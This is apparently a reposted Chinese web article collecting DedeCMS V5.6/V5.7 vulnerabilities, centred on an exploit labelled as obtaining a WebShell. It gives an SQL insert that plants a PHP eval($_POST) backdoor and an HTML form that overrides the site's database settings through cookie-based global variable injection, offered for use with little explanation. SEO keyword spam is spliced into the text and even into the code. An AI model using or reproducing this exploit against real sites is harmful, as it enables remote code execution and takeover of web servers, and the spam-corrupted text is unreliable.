Dedecms V5.6/V5.7漏洞問題收集總結,織夢技術
導讀:織夢技術織夢技術昨天自己的一個網站中毒了,花了N天時間沒有找出來,前天沒事搜索了一下dedecms漏洞,結果發現V5.6/V5.7漏洞一堆一堆的,下面我收集了現在Dedecmsdede免費校板下戰織夢模板免費。
DedeCms v5.6-5.7 最新漏洞 拿 WebShell EXP (5.18)
前題條件,必須準備好自己的dede,然后插入數據:
以下是引用片段:
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @("1.php"織夢模板, 'a');@fwrite($fp, '<?php eval($_POST[c]) ?>');echo "OK";@fclose($fp);{/dede:php}');
再用下面表單提交,shell 就在同目錄下 1.php。原理自己研究。。。
以下是引用片段:
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();"> <input type="text" value="http://localhost:8080/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br /> <input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br /> <input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br /> <input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br /> <input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br /> <input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br /> <input type="text" value="true" name="nocache" style="width:400"> <input type="submit" value="提交" name="QuickSearchBtn"><br /> </form> <script> function addaction() { document.QuickSearch.action=document.QuickSearch.doaction.value; } </script>
聲明: 本文由我的SEOUC技術文章主頁發布于:2023-07-19 ,文章Dedecms V5.6/V5.7漏洞問題收集總結,織夢技術主要講述漏洞,標簽,織夢網站建設源碼以及服務器配置搭建相關技術文章。轉載請保留鏈接: http://www.bifwcx.com/article/web_30981.html
為你推薦與Dedecms V5.6/V5.7漏洞問題收集總結,織夢技術相關的文章
